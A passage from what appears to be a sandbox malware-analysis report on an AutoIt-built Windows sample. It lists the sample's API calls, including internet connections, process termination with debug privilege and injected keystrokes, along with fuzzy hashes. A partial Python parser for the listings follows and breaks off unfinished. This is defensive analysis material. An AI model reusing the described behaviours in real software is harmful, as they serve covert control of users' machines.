                                                  • API ID: ClassMessageNameParentSend
                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                  • API String ID: 1290815626-3381328864
                                                  • Opcode ID: e0a6e0bef081e0cf3345b49de694057c56188efb195d98af04d37a85aa9a1589
                                                  • Instruction ID: 3e8a6a97549bb92d44c89d57c9481e59c2617df07bf12c44ae45568ca9ff8f23
                                                  • Opcode Fuzzy Hash: e0a6e0bef081e0cf3345b49de694057c56188efb195d98af04d37a85aa9a1589
                                                  • Instruction Fuzzy Hash: 681120B658470BBAFA112220DC1FDF67F9DFF05325F210115FB05A50D2FE65A8469918
                                                  APIs
Similarity
• API ID: _free$EnvironmentVariable___from_strstr_to_strchr
• String ID:
• API String ID: 1282221369-0
APIs
• SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00625186
• ShowWindow.USER32(?,00000000), ref: 006251C7
• ShowWindow.USER32(?,00000005,?,00000000), ref: 006251CD
• SetFocus.USER32(?,?,00000005,?,00000000), ref: 006251D1
  • Part of subcall function 00626FBA: DeleteObject.GDI32(00000000), ref: 00626FE6
• GetWindowLongW.USER32(?,000000F0), ref: 0062520D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0062521A
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0062524D
• SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00625287
• SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00625296
Similarity
• API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
• String ID:
• API String ID: 3210457359-0
APIs
• LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 005E6890
• ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 005E68A9
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005E68B9
• ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 005E68D1
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 005E68F2
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,005A8874,00000000,00000000,00000000,000000FF,00000000), ref: 005E6901
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 005E691E
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,005A8874,00000000,00000000,00000000,000000FF,00000000), ref: 005E692D
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0060C182
• GetLastError.KERNEL32 ref: 0060C195
• SetEvent.KERNEL32(?), ref: 0060C1A9
  • Part of subcall function 0060C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0060C272
  • Part of subcall function 0060C253: GetLastError.KERNEL32 ref: 0060C322
  • Part of subcall function 0060C253: SetEvent.KERNEL32(?), ref: 0060C336
  • Part of subcall function 0060C253: InternetCloseHandle.WININET(00000000), ref: 0060C341
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
APIs
  • Part of subcall function 005F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F3A57
  • Part of subcall function 005F3A3D: GetCurrentThreadId.KERNEL32 ref: 005F3A5E
  • Part of subcall function 005F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F25B3), ref: 005F3A65
• MapVirtualKeyW.USER32(00000025,00000000), ref: 005F25BD
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005F25DB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 005F25DF
• MapVirtualKeyW.USER32(00000025,00000000), ref: 005F25E9
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 005F2601
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 005F2605
• MapVirtualKeyW.USER32(00000025,00000000), ref: 005F260F
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 005F2623
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 005F2627
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,005F1449,?,?,00000000), ref: 005F180C
• HeapAlloc.KERNEL32(00000000,?,005F1449,?,?,00000000), ref: 005F1813
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005F1449,?,?,00000000), ref: 005F1828
• GetCurrentProcess.KERNEL32(?,00000000,?,005F1449,?,?,00000000), ref: 005F1830
• DuplicateHandle.KERNEL32(00000000,?,005F1449,?,?,00000000), ref: 005F1833
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005F1449,?,?,00000000), ref: 005F1843
• GetCurrentProcess.KERNEL32(005F1449,00000000,?,005F1449,?,?,00000000), ref: 005F184B
• DuplicateHandle.KERNEL32(00000000,?,005F1449,?,?,00000000), ref: 005F184E
• CreateThread.KERNEL32(00000000,00000000,005F1874,00000000,00000000,00000000), ref: 005F1868
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
APIs
  • Part of subcall function 005FD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 005FD501
  • Part of subcall function 005FD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 005FD50F
  • Part of subcall function 005FD4DC: CloseHandle.KERNEL32(00000000), ref: 005FD5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0061A16D
• GetLastError.KERNEL32 ref: 0061A180
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0061A1B3
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0061A268
• GetLastError.KERNEL32(00000000), ref: 0061A273
• CloseHandle.KERNEL32(00000000), ref: 0061A2C4
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00623925
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0062393A
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00623954
• _wcslen.LIBCMT ref: 00623999
• SendMessageW.USER32(?,00001057,00000000,?), ref: 006239C6
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 006239F4
Strings
Similarity
• API ID: MessageSend$Window_wcslen
• String ID: SysListView32
• API String ID: 2147712094-78025650
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005FBCFD
• IsMenu.USER32(00000000), ref: 005FBD1D
• CreatePopupMenu.USER32 ref: 005FBD53
• GetMenuItemCount.USER32(01634670), ref: 005FBDA4
• InsertMenuItemW.USER32(01634670,?,00000001,00000030), ref: 005FBDCC
Strings
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
APIs
• _ValidateLocalCookies.LIBCMT ref: 005B2D4B
• ___except_validate_context_record.LIBVCRUNTIME ref: 005B2D53
• _ValidateLocalCookies.LIBCMT ref: 005B2DE1
• __IsNonwritableInCurrentImage.LIBCMT ref: 005B2E0C
• _ValidateLocalCookies.LIBCMT ref: 005B2E61
Strings
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: &H[$csm
• API String ID: 1170836740-2052090383
                                                  APIs
                                                  • LoadIconW.USER32(00000000,00007F03), ref: 005FC913
                                                  Strings
                                                  Similarity
                                                  • API ID: IconLoad
                                                  • String ID: blank$info$question$stop$warning
                                                  • API String ID: 2457776203-404129466
                                                  • Opcode ID: ec0dd51d70e34d19fc107ff5ec01d1482b30a6c4a750aa1834eccdf9588b16d6
                                                  • Instruction ID: 795759a5f9fbe3442380d41b2b8e12c6f8890a69c126899f3894597727ae5768
                                                  • Opcode Fuzzy Hash: ec0dd51d70e34d19fc107ff5ec01d1482b30a6c4a750aa1834eccdf9588b16d6
                                                  • Instruction Fuzzy Hash: 9A115E3168930FBBE7105710DE82CFE6F9CFF15755B50003AF600A7182D7A9BE445664
                                                  APIs
                                                  Similarity
                                                  • API ID: _wcslen$LocalTime
                                                  • String ID:
                                                  • API String ID: 952045576-0
                                                  • Opcode ID: c8beabbe6f8f591b36d7b1c12d2981ff866c23d8184333b881d0140f0255c3a1
                                                  • Instruction ID: 55dfb20e3db80353f37c8f86aa778c5748fb4e96337261d8a3aec3a20a55dbc9
                                                  • Opcode Fuzzy Hash: c8beabbe6f8f591b36d7b1c12d2981ff866c23d8184333b881d0140f0255c3a1
                                                  • Instruction Fuzzy Hash: 41419269C1011966DB11EBB48C8F9DFBBACBF85310F508466E614E3122FB38E245C7A5
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,005E682C,00000004,00000000,00000000), ref: 005AF953
                                                  • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,005E682C,00000004,00000000,00000000), ref: 005EF3D1
                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,005E682C,00000004,00000000,00000000), ref: 005EF454
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: fb878f2ed0ca24b4062b1d8e44784d0101545b6f29fab4f75de1a89c9af60631
                                                  • Instruction ID: ec0ff481a211aa0dd16f5f1422ebb02c98f7e5db905c1ff18e6aa07c773e4fd5
                                                  • Opcode Fuzzy Hash: fb878f2ed0ca24b4062b1d8e44784d0101545b6f29fab4f75de1a89c9af60631
                                                  • Instruction Fuzzy Hash: 53411931608680BECB798B69D89876F7F92BF97324F14583CE08757560DA72A881CB51
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00622D1B
                                                  • GetDC.USER32(00000000), ref: 00622D23
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00622D2E
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00622D3A
                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00622D76
                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00622D87
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00625A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00622DC2
                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00622DE1
                                                  Similarity
                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                  • String ID:
                                                  • API String ID: 3864802216-0
                                                  • Opcode ID: 2aa0d0b58b4db9d01b08b3fd3afc185e08dca40f0b6c45150476e5bdda5b916e
                                                  • Instruction ID: e96d5a7bf82b293d3cd0627072ac3a670356ffcd9b7d43793ee2a3f44ee0e353
                                                  • Opcode Fuzzy Hash: 2aa0d0b58b4db9d01b08b3fd3afc185e08dca40f0b6c45150476e5bdda5b916e
                                                  • Instruction Fuzzy Hash: 6B317F72201A24BFEB214F50DC8AFEB3BAAEF09725F044055FE089A291C6759C51CBA4
                                                  APIs
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 7acad05dc88f3db8f012f74e912a16201fb04ae5e1ecd0d22957cfe9cd5de256
                                                  • Instruction ID: 607a028a1e7a07f2e1e7d6f1d22147286abc1df1d686f029fb4eed04d0c8f0bf
                                                  • Opcode Fuzzy Hash: 7acad05dc88f3db8f012f74e912a16201fb04ae5e1ecd0d22957cfe9cd5de256
                                                  • Instruction Fuzzy Hash: CD21F261745E1E7B925466209E92FFB2BADBF603C4F840430FF17DA681F728ED1085A9
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                  • API String ID: 0-572801152
                                                  • Opcode ID: 6bd89efbb9f9de9731ce9e4259892fddd4bda8f2f2e5be534c43770f7c76cbdc
                                                  • Instruction ID: 759728321e29151172ad21c04435f97e86568beb4b443ca44557996d461ea4e0
                                                  • Opcode Fuzzy Hash: 6bd89efbb9f9de9731ce9e4259892fddd4bda8f2f2e5be534c43770f7c76cbdc
                                                  • Instruction Fuzzy Hash: 6BD19671A0060ADFDF10DF98D881BEEB7B6BF88344F188469E916AB281D770DD85CB50
                                                  APIs
                                                  • GetCPInfo.KERNEL32(?,?), ref: 005D15CE
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005D1651
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005D16E4
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005D16FB
                                                    • Part of subcall function 005C3820: RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005D1777
                                                  • __freea.LIBCMT ref: 005D17A2
                                                  • __freea.LIBCMT ref: 005D17AE
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                  • String ID:
                                                  • API String ID: 2829977744-0
                                                  • Opcode ID: da3db7abe39aff89adddfb1c54050f6ebaee585149559b947b7178bc200b3514
                                                  • Instruction ID: db9828ec50cb8837055591062fa1bd7e225cd9da975492ba7af007580069e95a
                                                  • Opcode Fuzzy Hash: da3db7abe39aff89adddfb1c54050f6ebaee585149559b947b7178bc200b3514
                                                  • Instruction Fuzzy Hash: 0691C271E00A06AEDB308EA8D985AEE7FB5FF49310F18465BE806E7351D729DC40CB64
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: Variant$ClearInit
                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                  • API String ID: 2610073882-625585964
                                                  • Opcode ID: 3ce37dadb81bc5ec1f76301c844c10c020e47e8bbd01482ceeeeb5111f78df94
                                                  • Instruction ID: 03e5b693d4a463aee7f949b04023e46f0e928c480fa52b36ec49b54a35979a8d
                                                  • Opcode Fuzzy Hash: 3ce37dadb81bc5ec1f76301c844c10c020e47e8bbd01482ceeeeb5111f78df94
                                                  • Instruction Fuzzy Hash: 83918171A00215ABDF20CFA4D844FEEBBBAEF46715F148559F505AB280DB709985CFA0
                                                  APIs
                                                  • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0060125C
                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00601284
                                                  • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 006012A8
                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006012D8
                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0060135F
                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006013C4
                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00601430
                                                  Similarity
                                                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                  • String ID:
                                                  • API String ID: 2550207440-0
                                                  • Opcode ID: 1d24608326a720448a05675533a53e0ee95ec5dfe220b6e1caa4de6c8bc73101
                                                  • Instruction ID: 13c33f91b88ed509761d0cb4db251a1f25df4332e4bab9436c2205f84cf4890a
                                                  • Opcode Fuzzy Hash: 1d24608326a720448a05675533a53e0ee95ec5dfe220b6e1caa4de6c8bc73101
                                                  • Instruction Fuzzy Hash: 6891B071A402199FEB18DF94C885BBFB7B6FF46325F144029E501EB2E1D774A942CB90
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: 0c86b328571628898fb28ea2069f988bfe4d978d7e46bdfba4b59d8473e27e39
                                                  • Instruction ID: 4cfc080b1d906ff8a5654bd8a7c121bc88671104e5ce5ae88e74014925c7bef2
                                                  • Opcode Fuzzy Hash: 0c86b328571628898fb28ea2069f988bfe4d978d7e46bdfba4b59d8473e27e39
                                                  • Instruction Fuzzy Hash: 62912671D0021AEFCB14CFA9C889AEEBFB9FF89320F148455E515B7251D375A942CBA0
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 0061396B
                                                  • CharUpperBuffW.USER32(?,?), ref: 00613A7A
                                                  • _wcslen.LIBCMT ref: 00613A8A
                                                  • VariantClear.OLEAUT32(?), ref: 00613C1F
                                                    • Part of subcall function 00600CDF: VariantInit.OLEAUT32(00000000), ref: 00600D1F
                                                    • Part of subcall function 00600CDF: VariantCopy.OLEAUT32(?,?), ref: 00600D28
                                                    • Part of subcall function 00600CDF: VariantClear.OLEAUT32(?), ref: 00600D34
                                                  Strings
                                                  Similarity
                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                  • API String ID: 4137639002-1221869570
                                                  • Opcode ID: 7492788754723882b773aa9762a2b4da092ab47f7352164460315aa1446b82d3
                                                  • Instruction ID: df5782dbbac66e10f86b395803c266347b9af10d2ab661f9f497112bdc79c10d
                                                  • Opcode Fuzzy Hash: 7492788754723882b773aa9762a2b4da092ab47f7352164460315aa1446b82d3
                                                  • Instruction Fuzzy Hash: 58916D746083059FCB04DF24C4849AABBE5FF89314F18896DF88A9B351DB30EE45CB92
                                                  APIs
                                                    • Part of subcall function 005F000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?,?,005F035E), ref: 005F002B
                                                    • Part of subcall function 005F000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0046
                                                    • Part of subcall function 005F000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0054
                                                    • Part of subcall function 005F000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?), ref: 005F0064
                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00614C51
                                                  • _wcslen.LIBCMT ref: 00614D59
                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00614DCF
                                                  • CoTaskMemFree.OLE32(?), ref: 00614DDA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                  • String ID: NULL Pointer assignment
                                                  • API String ID: 614568839-2785691316
                                                  • Opcode ID: e3eee52abd4dc9c05fef77f0332f00601674eecd0d3b3a028b55274d51e5024a
                                                  • Instruction ID: 0fbcdeb6767481fea74d77d926beb155bf0198bacb58f3d1ab65731f20b878eb
                                                  • Opcode Fuzzy Hash: e3eee52abd4dc9c05fef77f0332f00601674eecd0d3b3a028b55274d51e5024a
                                                  • Instruction Fuzzy Hash: DA914971D0021EAFDF10DFA4D894EEEBBB9BF48310F148169E915A7241EB349A45CFA0
                                                  APIs
                                                  • GetMenu.USER32(?), ref: 00622183
                                                  • GetMenuItemCount.USER32(00000000), ref: 006221B5
                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006221DD
                                                  • _wcslen.LIBCMT ref: 00622213
                                                  • GetMenuItemID.USER32(?,?), ref: 0062224D
                                                  • GetSubMenu.USER32(?,?), ref: 0062225B
                                                    • Part of subcall function 005F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F3A57
                                                    • Part of subcall function 005F3A3D: GetCurrentThreadId.KERNEL32 ref: 005F3A5E
                                                    • Part of subcall function 005F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F25B3), ref: 005F3A65
                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006222E3
                                                    • Part of subcall function 005FE97B: Sleep.KERNEL32 ref: 005FE9F3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                  • String ID:
                                                  • API String ID: 4196846111-0
                                                  • Opcode ID: dcb35229f55ada9878297251ed4eacba627fb7959fbdb64a5b43c0e4cdf33303
                                                  • Instruction ID: 04ef5dbdc4092798783da52d09f90819fa6a0887b4b9faafcb2c7233c7c05c4a
                                                  • Opcode Fuzzy Hash: dcb35229f55ada9878297251ed4eacba627fb7959fbdb64a5b43c0e4cdf33303
                                                  • Instruction Fuzzy Hash: B8718F35A00616EFCB10DFA4D855AAEBBF6FF88310F108459E916AB351D735EE428F90
                                                  APIs
                                                  • GetParent.USER32(?), ref: 005FAEF9
                                                  • GetKeyboardState.USER32(?), ref: 005FAF0E
                                                  • SetKeyboardState.USER32(?), ref: 005FAF6F
                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 005FAF9D
                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 005FAFBC
                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 005FAFFD
                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 005FB020
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 4fba668e2b94e9c22a74682e9500285fc808d4ae4b4bf33d08b1993006cd8959
                                                  • Instruction ID: 82979c305cb676808aa7380a2d17199d984567f9d836d09b04d05e20bc823b81
                                                  • Opcode Fuzzy Hash: 4fba668e2b94e9c22a74682e9500285fc808d4ae4b4bf33d08b1993006cd8959
                                                  • Instruction Fuzzy Hash: E35191E06047D97DFB364234CC49BBA7EA97B06304F088589E2D9598C3D79DA8C4D752
                                                  APIs
                                                  • GetParent.USER32(00000000), ref: 005FAD19
                                                  • GetKeyboardState.USER32(?), ref: 005FAD2E
                                                  • SetKeyboardState.USER32(?), ref: 005FAD8F
                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 005FADBB
                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 005FADD8
                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 005FAE17
                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 005FAE38
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 59885ad6cb8c219ffd16512a0582419b45835211e6a02ca29f9d26387195ec43
                                                  • Instruction ID: 74e9809756019a84a420ff50e995e508a50328eb13a3b5ce38d7e4afd16c6702
                                                  • Opcode Fuzzy Hash: 59885ad6cb8c219ffd16512a0582419b45835211e6a02ca29f9d26387195ec43
                                                  • Instruction Fuzzy Hash: E051B1E15447D93DFB368324CC55B7ABEA97B46300F088589E3D9868C2D298EC88D763
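Each function block above lists the raw API calls (subcall entries included) and, under Similarity, a derived "API ID" string that the report uses to match the function against other samples. The following is an added example, not part of this report and not Joe Sandbox code: it parses function blocks in the format shown on this page, rebuilds the API ID from the listed calls, checks it against the reported value, and decodes the PostMessageW arguments of the two keyboard-state functions above with the standard Win32 constants (WM_KEYDOWN 0x0100, WM_KEYUP 0x0101, VK_SHIFT 0x10, VK_CONTROL 0x11, VK_MENU 0x12, VK_LWIN 0x5B). The grouping rule (words sorted by descending call count, ASCII order inside a group, groups joined with `$`) and the stop-word list are inferred from the IDs printed on this page and are assumptions, not a documented algorithm. The two sample blocks are constructed by copying the WM_KEYUP function and the socket function listings from this page.

```python
import re
from collections import Counter

# Constructed samples in the report's own format (bullet, API.MODULE(args),
# ref: address, then the block's "API ID" line): the WM_KEYUP modifier-key
# function listed above, and the socket function, whose subcall entries and
# lower-case/underscore names exercise the sort-order edge case.
KEYUP_BLOCK = """\
• GetParent.USER32(?), ref: 005FAEF9
• GetKeyboardState.USER32(?), ref: 005FAF0E
• SetKeyboardState.USER32(?), ref: 005FAF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 005FAF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 005FAFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 005FAFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 005FB020
Memory Dump Source
• API ID: MessagePost$KeyboardState$Parent
"""
SOCKET_BLOCK = """\
  • Part of subcall function 0061304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0061307A
  • Part of subcall function 0061304E: _wcslen.LIBCMT ref: 0061309B
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00611112
• WSAGetLastError.WSOCK32 ref: 00611121
• WSAGetLastError.WSOCK32 ref: 006111C9
• closesocket.WSOCK32(00000000), ref: 006111F9
Memory Dump Source
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
"""

CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
API_ID_RE = re.compile(r"•\s*API ID:\s*(?P<id>\S*)")
CAMEL_RE = re.compile(r"[A-Z]+(?![a-z])|[A-Z][a-z]+")
# Words the report's API IDs visibly drop (Get/Set, W/A/Ex, module prefixes
# Co/Sys/SH/WSA, type words ID/CLSID/GUID/Mem/CP/To/Sub). ASSUMPTION inferred
# from this page's listings, not a published Joe Sandbox rule.
STOP = {"get", "set", "w", "a", "ex", "id", "co", "sys", "sh", "wsa",
        "clsid", "guid", "mem", "cp", "to", "sub"}
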